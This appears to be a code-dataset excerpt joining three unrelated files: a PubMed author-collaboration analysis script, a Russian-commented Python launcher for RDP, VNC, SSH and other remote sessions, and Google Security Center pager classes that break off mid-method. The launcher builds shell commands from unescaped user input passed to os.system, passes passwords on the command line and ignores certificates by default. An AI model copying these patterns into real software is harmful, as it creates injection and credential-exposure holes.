mapped_field_discipline = pubmed.progress_apply(lambda x: journal_match(x['journal'], x['journal_iso']), axis=1)
# Add journal field to the pubmed data frame
pubmed['field'] = mapped_field_discipline.progress_map(lambda x: x[0])
# Add journal discipline to the pubmed data frame
pubmed['discipline'] = mapped_field_discipline.progress_map(lambda x: x[1])
def duplicate_remover(input_list):
ordered_set = list()
for element in input_list:
if element not in ordered_set:
ordered_set.append(element)
return ordered_set
def grant_processor(grant):
list_of_grants = [g.split("; ") for g in grant.split(" | ")]
grant_ids = list()
agencies = list()
regions = list()
for g in list_of_grants:
for id in g[0].split(", "):
if id not in grant_ids:
grant_ids.append(id)
if g[1] not in agencies:
agencies.append(g[1])
if g[2] not in regions:
regions.append(g[2])
return grant_ids, agencies, regions
grants = pubmed['grants'].progress_map(grant_processor, na_action='ignore')
pubmed['grant_ids'] = grants.map(lambda x: x[0], na_action='ignore')
pubmed['grant_funders'] = grants.map(lambda x: x[1], na_action='ignore')
pubmed['grant_region'] = grants.map(lambda x: x[2], na_action='ignore')
del pubmed['grants']
def keywords_mesh_combine(keywords, mesh):
if str(keywords) == 'nan' and str(mesh) != 'nan':
return mesh
elif str(mesh) == 'nan' and str(keywords) != 'nan':
return keywords
elif str(mesh) == 'nan' and str(keywords) == 'nan':
return np.NaN
return "; ".join(set(keywords.split("; ") + mesh.split("; ")))
pubmed['keywords'] = pubmed.progress_apply(lambda x: keywords_mesh_combine(x['keywords'], x['mesh_terms']), axis=1)
del pubmed['mesh_terms']
# ------------------------------------------------------------------------- #
# Add Author+Afiliation #
# ------------------------------------------------------------------------- #
pubmed['author'] = pubmed['author'].str.split("; ")
pubmed['affiliation'] = pubmed['affiliation'].str.split("; ")
authors = pubmed['author'][0]
affiliations = pubmed['affiliation'][0]
# want: department + institution
def subsection_and_uni(affiliation, join_output=True, institution_only=False):
# look into C Benz - Medicine
# bazar result from:
# 1. pubmed[pubmed['author'].map(lambda x: 'C Hu' in x if str(x) != 'nan' else False)]['institution'][62284]
# 2. and the Eye and Ear Institute
department = None
institution = None
affiliation_split = affiliation.split(", ")
if affiliation_split == 1:
return np.NaN
department_terms = ['institute', 'department', 'division', 'dept']
institution_terms = ['institute', 'university', 'centre', 'school', 'center', 'clinic',
'hospital', 'national labratory', 'research labratory', 'college', 'library']
institution_deference = ['institute']
department_match = [i for i in affiliation_split if any(w in i.lower() for w in department_terms)]
if len(department_match) > 0:
department = department_match[0]
institution_match = [i for i in affiliation_split if any(w in i.lower() for w in institution_terms)]
if len(institution_match) == 1:
institution = institution_match[0]
elif len(institution_match) > 1:
institution = institution_match[-1]
if (department is None and institution is None) or institution is None:
return np.NaN
elif institution_only or \
(institution is not None and department is None) or \
(any(i in department.lower() for i in institution_deference) and institution is not None):
return institution
if join_output:
return ", ".join((department, institution))
else:
return ((department if department != None else np.NaN), (institution if institution != None else np.NaN))
def multi_affiliations(affiliations):
processed_affiliations = (subsection_and_uni(a, institution_only=True) for a in affiliations)
cleaned = [i for i in processed_affiliations if str(i) != 'nan']
if len(cleaned):
return "; ".join(cleaned)
else:
return np.NaN
def author_affil(authors, affiliations):
# Remove emails?
if 'nan' in [str(authors), str(affiliations)] or not len(authors) or not len(affiliations):
return np.NaN
if len(authors) > len(affiliations):
authors = authors[:len(affiliations)]
if len(affiliations) > len(authors):
affiliations = affiliations[:len(authors)]
cleaned_affilations = [a for a in map(subsection_and_uni, affiliations) if str(a) != 'nan']
if len(cleaned_affilations):
authors_afil = list(zip(authors, list(map(lambda a: subsection_and_uni(a), cleaned_affilations))))
return [" | ".join(a) for a in authors_afil]
else:
return np.NaN
pubmed['institutions'] = pubmed['affiliation'].progress_map(lambda a: multi_affiliations(a), na_action='ignore')
pubmed['author_afil'] = pubmed.progress_apply(lambda x: author_affil(x['author'], x['affiliation']), axis=1)
# pubmed['institutions'][pubmed['institutions'].map(lambda x: ";" in x if str(x) != 'nan' else False)]
# TO DO: replace dept and dept.
# ---------------------------------------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------------------------------------- #
# Export
# pubmed['author_afil'] = pubmed['author_afil'].progress_map(lambda x: "; ".join(x))
# ---------------------------------------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------------------------------------- #
# ---------------------------------------------------------------------------------------------------------- #
# ------------------------------------------------------------------------- #
# Add Keywords #
# ------------------------------------------------------------------------- #
# Faster -- 42588.45 ms on average (N=3)
# title_keywords = pubmed['title'].map(lambda x: common_words(x, n=5, return_rank=False, digit_check=False), na_action='ignore')
# # Slower -- 47377.06 ms on average (N=3)...but easier to monitor.
# title_keywords = [0]*pubmed.shape[0]
# for t in range(len(pubmed['title'])):
# if t % 1000 == 0: print(round(float(t)/len(pubmed['title'])*100, 2), "%")
# title_keywords[t] = common_words(pubmed['title'][t], n=5, return_rank=False, digit_check=True, wrap_nans=False)
#
# # Add Keywords based on the title
# pubmed['keywords'] = title_keywords
# ------------------------------------------------------------------------- #
# Find Collaborations #
# ------------------------------------------------------------------------- #
# The most of the 'solutions' below are really just a series of hacks designed to
# drive down the run down because, frankly, this problem is a gemoetric nighmare when you have ~ 12 million rows.
# "...premature optimization is the root of all evil." ~ Donald Knuth
# So, you know, do as I say, not...
# ---------------------------------------------------------------------------------------- #
# Author + Index (to be used to locate field_discipline). This operation is vectorized (minus that map()...).
authors_field_discipline = pubmed['author_afil'] + pd.Series(mapped_field_discipline.index).progress_map(lambda x: [x])
# Try to work out collaborators.
# Thanks to @zvone on stackoverflow.
# see: http://stackoverflow.com/questions/39677070/procedure-to-map-all-relationships-between-elements-in-a-list-of-lists
collaborators_dict = defaultdict(set)
for paper in authors_field_discipline:
if str(paper) != 'nan':
for author in paper:
if str(author) != 'nan':
collaborators_dict[author].update(paper)
for author, collaborators in collaborators_dict.items():
collaborators.remove(author)
# from itertools import chain
# a = list(chain.from_iterable(authors_field_discipline.dropna().tolist()))
# ------------------------------------------------------------------------- #
# Find the Fields For Each Author #
# ------------------------------------------------------------------------- #
# dict of fields with keys corresponding to the pubmed df
field_nan_drop = pubmed['field'].dropna().reset_index()
index_field_dict = dict(zip(field_nan_drop['index'], field_nan_drop['field']))
# dict of disciplines with keys corresponding to the pubmed df
discipline_nan_drop = pubmed['discipline'].dropna().reset_index()
discipline_field_dict = dict(zip(discipline_nan_drop['index'], discipline_nan_drop['discipline']))
def collaborators_domain_seperator(single_author):
"""
Separates a list of authors and pubmed indexes into a list of lists of the form: [[AUTHORS], [FIELD], [DISCIPLINE]].
Please see: http://stackoverflow.com/questions/14776980/python-splitting-list-that-contains-strings-and-integers
Notes:
1. necessary to set(collab_domain)? Unclear.
2. add year information?
:param collab_domain:
:return:
:rtype: dict
"""
collab_dict = defaultdict(list)
for i in collaborators_dict[single_author]:
collab_dict[type(i)].append(i)
fields = list()
disciplines = list()
for i in collab_dict[int]:
if i in index_field_dict:
fields += index_field_dict[i]
if i in discipline_field_dict:
disciplines += discipline_field_dict[i]
set_fields = set(fields)
set_disciplines = set(disciplines)
info = {"index_of_papers": collab_dict[int]
, "num_authored": len(collab_dict[int])
, "collaborators": collab_dict[str] if len(collab_dict[str]) else np.NaN
, "num_collaborators": len(collab_dict[str])
, "fields": set_fields if len(set_fields) else np.NaN
, "disciplines": set_disciplines if len(set_disciplines) else np.NaN}
return info
# import cProfile
# cProfile.runctx("for i in range(10000): "
# " collaborators_domain_seperator({'Yum SK', 'Youn YA', 55558, 'Lee IG', 55597, 'Kim JH', 'Moon CJ'})"
# , None, locals())
# def fast_flatten(input_list):
# return list(chain.from_iterable(input_list))
c = 0
author_info = dict()
len_authors = len(pubmed['author_afil'])
for authors in pubmed['author_afil']:
c += 1
if c % 10000 == 0 or c == 1:
print(round(float(c) / len_authors * 100, 2), "%")
if str(authors) != 'nan':
for a in authors:
author_info[a] = collaborators_domain_seperator(a)
author_df = pd.DataFrame(list(author_info.values()))
author_full = [a.split(" | ") for a in list(author_info.keys())]
author_df['authors'] = [a[0] for a in author_full]
author_df['institutions'] = [a[1] for a in author_full]
author_df[(author_df.num_collaborators > 0) & pd.notnull(author_df.fields)]
# NOTE:
# Problem: Authors Sharing Name.
# len(set([i for s in pubmed['author'] for i in s]))
# # !=
# len([i for s in pubmed['author'] for i in s])
| gpl-3.0 | -1,397,716,387,540,309,500 | 34.569196 | 128 | 0.577722 | false |
ekorneechev/Connector | source/ctor.py | 1 | 22467 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import time, properties
from GLOBAL import *
from re import escape
try: import keyring
except Exception as error:
class Keyring:
def set_password(self, *args): pass
def get_password(self, *args): return ""
keyring = Keyring()
properties.log.warning("Python 3: %s. Password storage is not available for FreeRDP." % error)
try: enableLog = properties.loadFromFile('default.conf')['LOG']
except KeyError: enableLog = DEFAULT['LOG']
if enableLog: STD_TO_LOG = ' >> ' + STDLOGFILE + " 2>&1 &"
else: STD_TO_LOG = ' &'
def f_write(f_name, cfg):
"""Создание файла с конфигурацией для remmina"""
f = open(WORKFOLDER+f_name,"w")
f.write("[remmina]\n")
for key in cfg.keys():
print(key,cfg[key], sep='=',file=f)
f.close()
class Remmina:
"""Класс, обеспечивающий подключение через remmina"""
cfg = {}
f_name = ".tmp.remmina"
def create_cfg_file(self, args):
"""Создание файла конфигурации для соединения"""
protocol = self.cfg['protocol']
server, login = properties.searchSshUser(args[0])
self.cfg['server'] = server
self.cfg['name'] = args.pop()
if protocol == 'RDP':
#[user, domain, color, quality, resolution, viewmode, folder, printer, clipboard, sound]
self.cfg['username'] = args[1]
self.cfg['domain'] = args[2]
self.cfg['colordepth'] = args[3]
self.cfg['quality'] = args[4]
self.cfg['resolution'] = args[5]
self.cfg['viewmode'] = args[6]
self.cfg['sharefolder'] = args[7]
self.cfg['shareprinter'] = args[8]
self.cfg['disableclipboard'] = args[9]
self.cfg['sound'] = args[10]
self.cfg['sharesmartcard'] = args[11]
if protocol == 'NX':
#[user, quality, resolution, viewmode, keyfile, crypt, clipboard, _exec]
self.cfg['username'] = args[1]
self.cfg['quality'] = args[2]
self.cfg['resolution'] = args[3]
self.cfg['viewmode'] = args[4]
self.cfg['nx_privatekey'] = args[5]
self.cfg['disableencryption'] = args[6]
self.cfg['disableclipboard'] = args[7]
self.cfg['exec'] = args[8]
if protocol == 'VNC':
#[user, quality, color, viewmode, viewonly, crypt, clipboard, showcursor]
self.cfg['username'] = args[1]
self.cfg['quality'] = args[2]
self.cfg['colordepth'] = args[3]
self.cfg['viewmode'] = args[4]
self.cfg['viewonly'] = args[5]
self.cfg['disableencryption'] = args[6]
self.cfg['disableclipboard'] = args[7]
self.cfg['showcursor'] = args[8]
if protocol == 'XDMCP':
#[color, viewmode, resolution, once, showcursor, _exec]
self.cfg['colordepth'] = args[1]
self.cfg['viewmode'] = args[2]
self.cfg['resolution'] = args[3]
self.cfg['once'] = args[4]
self.cfg['showcursor'] = args[5]
self.cfg['exec'] = args[6]
if protocol == 'SSH':
#[user, SSH_auth, keyfile, charset, _exec]
if login: self.cfg['ssh_username'] = login
else: self.cfg['ssh_username'] = args[1]
self.cfg['ssh_auth'] = args[2]
self.cfg['ssh_privatekey'] = args[3]
self.cfg['ssh_charset'] = args[4]
self.cfg['exec'] = args[5]
if protocol == 'SFTP':
#[user, SSH_auth, keyfile, charset, execpath]
if login: self.cfg['ssh_username'] = login
else: self.cfg['ssh_username'] = args[1]
self.cfg['ssh_auth'] = args[2]
self.cfg['ssh_privatekey'] = args[3]
self.cfg['ssh_charset'] = args[4]
self.cfg['execpath'] = args[5]
if protocol == 'SPICE':
#[tls, viewonly, resize, clipboard, cards, sound, cacert]
self.cfg['usetls'] = args[1]
self.cfg['viewonly'] = args[2]
self.cfg['resizeguest'] = args[3]
self.cfg['disableclipboard'] = args[4]
self.cfg['sharesmartcard'] = args[5]
self.cfg['enableaudio'] = args[6]
self.cfg['cacert'] = args[7]
f_write(self.f_name, self.cfg)
def start(self, parameters):
"""Запуск remmina с необходимыми параметрами"""
self.create_cfg_file(parameters)
properties.log.info ("Remmina: подключение по протоколу %s к серверу: %s", self.cfg['protocol'], self.cfg['server'])
command = 'remmina -c "' + WORKFOLDER + self.f_name + '"'
properties.log.info (command)
os.system('cd $HOME && ' + command + STD_TO_LOG)
class VncRemmina(Remmina):
"""Класс для настройки VNC-соединения через Remmina"""
def __init__(self):
self.cfg = dict(keymap='', quality=9, disableencryption=0, colordepth=24,
hscale=0, group='', password='', name='VNC-connection: ', viewonly=0,
disableclipboard=0, protocol='VNC', vscale=0, username='', disablepasswordstoring=1,
showcursor=0, disableserverinput=0, server='',aspectscale=0,
window_maximize=1, window_width=800, window_height=600, viewmode=1)
self.f_name = '.tmp_VNC.remmina'
class VncViewer:
"""Класс для настройки VNC-соединения через VncViewer"""
def start(self, args):
if type(args) == str:
properties.log.info ("VNC: подключение к серверу %s", args)
command = 'vncviewer ' + args
server = args
else:
command = 'vncviewer ' + args[0] + ' '
if args[1]: command += args[1]
if args[2]: command += args[2]
server = args[0]
properties.log.info ("VNC: подключение к серверу %s. Команда запуска:", server)
properties.log.info (command)
os.system(command + STD_TO_LOG)
class RdpRemmina(Remmina):
"""Класс для настройки RDP-соединения через Remmina"""
def __init__(self):
self.cfg = dict(disableclipboard=0, clientname='', quality=0, console=0, sharesmartcard=0,
resolution='', group='', password='', name='RDP-connection: ',
shareprinter=0, security='', protocol='RDP', execpath='', disablepasswordstoring=1,
sound='off', username='', sharefolder='', domain='', viewmode=3,
server='', colordepth=32, window_maximize=1, window_width=800, window_height=600)
self.cfg['exec'] = ''
self.f_name = '.tmp_RDP.remmina'
class XFreeRdp:
"""Класс для настройки RDP-соединения через xfreerdp"""
def start(self, args):
_link = "http://wiki.myconnector.ru/install#freerdp"
if freerdpCheck():
freerdpVersion = freerdpCheckVersion()
if freerdpVersion > "1.2":
nameConnect = args[len(args)-1]
command = 'xfreerdp /v:' + args[0] + " /t:'" + nameConnect + "'"
if args[1]: command += ' /u:' + args[1]
if args[2]: command += ' /d:' + args[2]
if args[3]: command += ' /f'
if args[4]: command += ' +clipboard'
if args[5]: command += ' /size:' + args[5]
if args[6]: command += ' /bpp:' + args[6]
if args[7]: command += ' /drive:LocalFolder,"' + args[7] + '"'
if args[8]: command += ' /g:' + args[8]
if args[9]: command += ' /gu:' + args[9]
if args[10]: command += ' /gd:' + args[10]
if args[11]:
command = "GATEPWD='" + args[11] + "' && " + command
command += ' /gp:$GATEPWD'
if args[12]: command += ' /admin'
if args[13]: command += SCARD
if args[14]: command += ' /printer'
if args[15]: command += ' /sound:sys:alsa'
if args[16]: command += ' /microphone:sys:alsa'
if args[17]: command += ' /multimon'
if args[18]: command += ' +compression'
if args[19]: command += ' /compression-level:' + args[19]
if args[20]: command += ' +fonts'
if args[21]: command += ' +aero'
if args[22]: command += ' +window-drag'
if args[23]: command += ' +menu-anims'
if args[24]: command += ' -themes'
if args[25]: command += ' -wallpaper'
if args[26]: command += ' /nsc'
if args[27]: command += ' /jpeg'
if args[28]: command += ' /jpeg-quality:' + str(args[28])
if args[29] and properties.checkPath(USBPATH): command += ' /drive:MEDIA,' + USBPATH
if args[31]: command += ' /workarea'
try: #Добавлена совместимость с предыдущей версией; < 1.4.0
if args[32]: command += ' /span'
except IndexError: pass
try: #< 1.4.1
if args[33]: command += ' /drive:Desktop,' + DESKFOLDER
if args[34]: command += ' /drive:Downloads,' + DOWNFOLDER
if args[35]: command += ' /drive:Documents,' + DOCSFOLDER
except IndexError: pass
try: #< 1.8.0
if args[36]: command += ' /gdi:hw'
else: command += ' /gdi:sw'
except IndexError: command += ' /gdi:sw'
try: #< 1.8.2
if args[38]: command += ' /cert-ignore'
if args[37]: command += ' +auto-reconnect'
except IndexError: command += ' +auto-reconnect /cert-ignore'
try:
if args[40] and len(args) >= 42: command += ' /p:' + escape(args[40])
elif args[30]: command += ' /p:' + escape(passwd(args[0], args[1]))
else: command += ' -sec-nla'
except: command += ' -sec-nla'
try:
if args[41] and len(args) >= 43: command += ' +glyph-cache'
except IndexError: pass
try:
# for compatibility also need to check lenght of 'args'
# length = 'last index' + 1 + 'title of the connect' (since version 1.5.6...)
if args[42] and len(args) >= 44: command += ' ' + args[42]
except IndexError: pass
server = args[0]
properties.log.info ("FreeRDP: подключение к серверу %s. Команда запуска:", server)
try: cmd2log = command.replace("/p:" + command.split("/p:")[1].split(' ')[0],"/p:<hidden>")
except: cmd2log = command
properties.log.info (cmd2log)
os.system(command + STD_TO_LOG)
if enableLog:
signal.signal(signal.SIGCHLD,signal.SIG_IGN)
subprocess.Popen([MAINFOLDER + "/connector-check-xfreerdp-errors"])
else:
properties.log.warning ("FreeRDP version below 1.2!")
os.system("zenity --error --text='\nУстановленная версия FreeRDP (%s) не соответствует минимальным требованиям,"
" подробности <a href=\"%s\">здесь</a>!' --no-wrap --icon-name=connector" % (freerdpVersion, _link))
else:
properties.log.warning ("FreeRDP is not installed!")
os.system("zenity --error --text='\nFreeRDP не установлен, подробности <a href=\"%s\">здесь</a>!' --no-wrap --icon-name=connector" % _link)
class NxRemmina(Remmina):
"""Класс для настройки NX-соединения через Remmina"""
def __init__(self):
self.cfg = dict(name='NX-connection: ', protocol='NX', quality=0, disableencryption=0,
resolution='',group='',password='',username='',NX_privatekey='',
showcursor=0, server='', disableclipboard=0, window_maximize=1,
window_width=800, window_height=600, viewmode=4, disablepasswordstoring=1)
self.cfg['exec'] = ''
self.f_name = '.tmp_NX.remmina'
class XdmcpRemmina(Remmina):
"""Класс для настройки XDMCP-соединения через Remmina"""
def __init__(self):
self.cfg = dict(resolution='', group='', password='', name='XDMCP-connection: ',
protocol='XDMCP', once=0, showcursor=0, server='',colordepth=0,
window_maximize=1, viewmode=1, window_width=800, window_height=600, disablepasswordstoring=1)
self.cfg['exec'] = ''
self.f_name = '.tmp_XDMCP.remmina'
class SftpRemmina(Remmina):
"""Класс для настройки SFTP-соединения через Remmina"""
def __init__(self):
self.cfg = dict(name='SFTP-connection: ', protocol='SFTP', ssh_enabled=0, ssh_auth=0,
ssh_charset='UTF-8', ssh_privatekey='', username='', ssh_username='',
group='', password='', execpath='/', server='', window_maximize=0,
window_height=600, window_width=800, ftp_vpanedpos=360, viewmode=0, disablepasswordstoring=1)
self.f_name = '.tmp_SFTP.remmina'
class SshRemmina(Remmina):
"""Класс для настройки SSH-соединения через Remmina"""
def __init__(self):
self.cfg = dict(name='SSH-connection: ', protocol='SSH', ssh_auth=0, ssh_charset='UTF-8',
ssh_privatekey='', group='', password='', username='', ssh_username='', ssh_enabled=0,
server='', window_maximize=0, window_width=500, window_height=500, viewmode=0, disablepasswordstoring=1)
self.cfg['exec'] = ''
self.f_name = '.tmp_SSH.remmina'
class SpiceRemmina(Remmina):
"""Класс для настройки SPICE-соединения через Remmina"""
def __init__(self):
self.cfg = dict(name='SPICE-connection: ', protocol='SPICE', ssh_enabled=0, ssh_auth=0,
disableclipboard=0, ssh_privatekey='', usertls=0, ssh_username='',
enableaudio=0, password='', cacert='', server='', ssh_loopback=0,
resizeguest=0, sharesmartcard=0, ssh_server='', viewonly=0, disablepasswordstoring=1)
self.f_name = '.tmp_SPICE.remmina'
class Vmware:
"""Класс для настройки соединения к VMWare серверу"""
def start(self, args):
if vmwareCheck():
if type(args) == str:
command = 'vmware-view -q -s ' + args
properties.log.info ("VMware: подключение к серверу %s", args)
properties.log.info (command)
else:
command = 'vmware-view -q -s ' + args[0]
if args[1]: command += ' -u ' + args[1]
if args[2]: command += ' -d ' + args[2]
if args[4]: command += ' --fullscreen'
properties.log.info ("VMware: подключение к серверу %s", args[0])
properties.log.info (command)
if args[3]: command += ' -p ' + args[3]
os.system(command + STD_TO_LOG)
else:
properties.log.warning ("VMware Horizon Client is not installed!")
os.system("zenity --error --text='\nVMware Horizon Client не установлен!' --no-wrap --icon-name=connector")
def _missCitrix():
"""Message for user, if Citrix Receiver not installed"""
properties.log.warning ("Citrix Receiver is not installed!")
os.system("zenity --error --text='\nCitrix Receiver не установлен!' --no-wrap --icon-name=connector")
class Citrix:
"""Класс для настройки ICA-соединения к Citrix-серверу"""
def start(self, args):
if type(args) == list:
addr = args[0]
else: addr = args
if citrixCheck():
properties.log.info ("Citrix: подключение к серверу %s", addr)
os.system('/opt/Citrix/ICAClient/util/storebrowse --addstore ' + addr)
os.system('/opt/Citrix/ICAClient/selfservice --icaroot /opt/Citrix/ICAClient' + STD_TO_LOG)
else: _missCitrix()
def preferences():
if citrixCheck():
properties.log.info ("Citrix: открытие настроек программы")
os.system('/opt/Citrix/ICAClient/util/configmgr --icaroot /opt/Citrix/ICAClient' + STD_TO_LOG)
else: _missCitrix()
class Web:
"""Класс для настройки подключения к WEB-ресурсу"""
def start(self, args):
if type(args) == list:
addr = args[0]
else: addr = args
if not addr.find("://") != -1:
addr = "http://" + addr
command = 'xdg-open "' + addr + '"'
properties.log.info ("WWW: открытие web-ресурса %s", addr)
properties.log.info (command)
os.system ( command + STD_TO_LOG)
class FileServer:
"""Класс для настройки подключения к файловому серверу"""
def start(self, args):
_exec = properties.loadFromFile('default.conf')['FS'] + ' "'
if type(args) == str:
if not args.find("://") != -1:
os.system("zenity --warning --text='Введите протокол подключения!\n"
"Или выберите из списка в дополнительных параметрах.' --no-wrap --icon-name=connector")
return 1
else:
command = _exec + args + '"'
server = args
else:
try: protocol, server = args[0].split("://")
except: server = args[0]; protocol = args[4]
command = _exec + protocol + "://"
if args[2]: command += args[2] + ";"
if args[1]: command += args[1] + "@"
command += server
if args[3]: command += '/' + args[3]
command += '"'
properties.log.info ("Открытие файлового сервера %s. Команда запуска:", server)
properties.log.info (command)
os.system (command + STD_TO_LOG)
def definition(protocol):
"""Функция определения протокола"""
whatProgram = properties.loadFromFile('default.conf') #загрузка параметров с выбором программ для подключения
if protocol == 'VNC':
if whatProgram['VNC'] == 0:
connect = VncRemmina()
else: connect = VncViewer()
elif protocol == 'RDP':
if whatProgram['RDP'] == 0:
connect = RdpRemmina()
else: connect = XFreeRdp()
elif protocol == 'NX':
connect = NxRemmina()
elif protocol == 'XDMCP':
connect = XdmcpRemmina()
elif protocol == 'SSH':
connect = SshRemmina()
elif protocol == 'SFTP':
connect = SftpRemmina()
elif protocol == 'VMWARE':
connect = Vmware()
elif protocol == 'CITRIX':
connect = Citrix()
elif protocol == 'WEB':
connect = Web()
elif protocol == 'SPICE':
connect = SpiceRemmina()
elif protocol == 'FS':
connect = FileServer()
return connect
def citrixCheck():
"""Фунцкия проверки наличия в системе Citrix Receiver"""
check = int(subprocess.check_output(CITRIX_CHECK + "/dev/null 2>&1; echo $?", shell=True, universal_newlines=True).strip())
check = not bool(check)
return check
def vmwareCheck():
"""Фунцкия проверки наличия в системе VMware Horizon Client"""
check = int(subprocess.check_output("which vmware-view > /dev/null 2>&1; echo $?", shell=True, universal_newlines=True).strip())
check = not bool(check)
return check
def freerdpCheck():
"""Фунцкия проверки наличия в системе FreeRDP"""
check = int(subprocess.check_output("which xfreerdp > /dev/null 2>&1; echo $?", shell=True, universal_newlines=True).strip())
check = not bool(check)
return check
def freerdpCheckVersion():
"""Фунцкия определения версии FreeRDP"""
version = subprocess.check_output("xfreerdp /version; exit 0",shell=True, universal_newlines=True).strip().split('\t')
version = version[0].split(" "); version = version[4].split("-")[0];
return version
def passwd(server, username):
"""Ввод пароля и запрос о его сохранении в связке ключей"""
password = keyring.get_password(str(server),str(username))
if password: return password
separator = "|CoNnEcToR|"
try:
password, save = subprocess.check_output("zenity --forms --title=\"Аутентификация (with NLA)\" --text=\"Имя пользователя: %s\""
" --add-password=\"Пароль:\" --add-combo=\"Хранить пароль в связке ключей:\" --combo-values=\"Да|Нет\""
" --separator=\"%s\" 2>/dev/null" % (username, separator),shell=True, universal_newlines=True).strip().split(separator)
if save == "Да" and password: keyring.set_password(str(server),str(username),str(password))
#если окно zenity закрыто или нажата кнопка Отмена, делаем raise ошибки FreeRDP
except ValueError:
password = " /CANCELED"
properties.log.warning ("FreeRDP: подключение отменено пользователем (окно zenity закрыто или нажата кнопка Отмена):")
return password
if __name__ == "__main__":
pass
| gpl-2.0 | -4,469,510,885,947,356,700 | 46.831435 | 151 | 0.551243 | false |
googleapis/googleapis-gen | google/cloud/securitycenter/v1p1beta1/securitycenter-v1p1beta1-py/google/cloud/securitycenter_v1p1beta1/services/security_center/pagers.py | 1 | 32661 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.securitycenter_v1p1beta1.types import notification_config
from google.cloud.securitycenter_v1p1beta1.types import securitycenter_service
from google.cloud.securitycenter_v1p1beta1.types import source
class GroupAssetsPager:
"""A pager for iterating through ``group_assets`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse` object, and
provides an ``__iter__`` method to iterate through its
``group_by_results`` field.
If there are more pages, the ``__iter__`` method will make additional
``GroupAssets`` requests and continue to iterate
through the ``group_by_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.GroupAssetsResponse],
request: securitycenter_service.GroupAssetsRequest,
response: securitycenter_service.GroupAssetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.GroupAssetsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.GroupAssetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.GroupAssetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[securitycenter_service.GroupResult]:
for page in self.pages:
yield from page.group_by_results
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class GroupAssetsAsyncPager:
"""A pager for iterating through ``group_assets`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``group_by_results`` field.
If there are more pages, the ``__aiter__`` method will make additional
``GroupAssets`` requests and continue to iterate
through the ``group_by_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[securitycenter_service.GroupAssetsResponse]],
request: securitycenter_service.GroupAssetsRequest,
response: securitycenter_service.GroupAssetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.GroupAssetsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.GroupAssetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.GroupAssetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[securitycenter_service.GroupAssetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[securitycenter_service.GroupResult]:
async def async_generator():
async for page in self.pages:
for response in page.group_by_results:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class GroupFindingsPager:
"""A pager for iterating through ``group_findings`` requests.
This class thinly wraps an initial
:class:`google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse` object, and
provides an ``__iter__`` method to iterate through its
``group_by_results`` field.
If there are more pages, the ``__iter__`` method will make additional
``GroupFindings`` requests and continue to iterate
through the ``group_by_results`` field on the
corresponding responses.
All the usual :class:`google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., securitycenter_service.GroupFindingsResponse],
request: securitycenter_service.GroupFindingsRequest,
response: securitycenter_service.GroupFindingsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.securitycenter_v1p1beta1.types.GroupFindingsRequest):
The initial request object.
response (google.cloud.securitycenter_v1p1beta1.types.GroupFindingsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = securitycenter_service.GroupFindingsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[securitycenter_service.GroupFindingsResponse]:
yield self._response
while self._response.next_page_token:
